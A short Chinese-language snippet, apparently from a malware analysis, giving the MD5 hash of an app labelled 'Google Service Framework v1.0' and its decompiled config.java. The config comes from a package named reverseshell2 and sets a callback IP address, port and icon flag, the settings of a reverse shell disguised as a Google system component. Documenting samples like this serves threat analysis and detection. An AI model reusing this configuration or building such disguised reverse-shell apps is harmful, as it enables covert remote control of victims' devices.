Google Service Framework v1.0版本的 MD5 值为:ccdc840a6e6237d6825dfbd264840abc

以下内容为反编译后的 config.java 源代码,内容仅作参考


package com.example.reverseshell2;
public class config {
    public static String IP = "192.168.194.130";
    public static String port = "8282";
    public static boolean icon = true;
}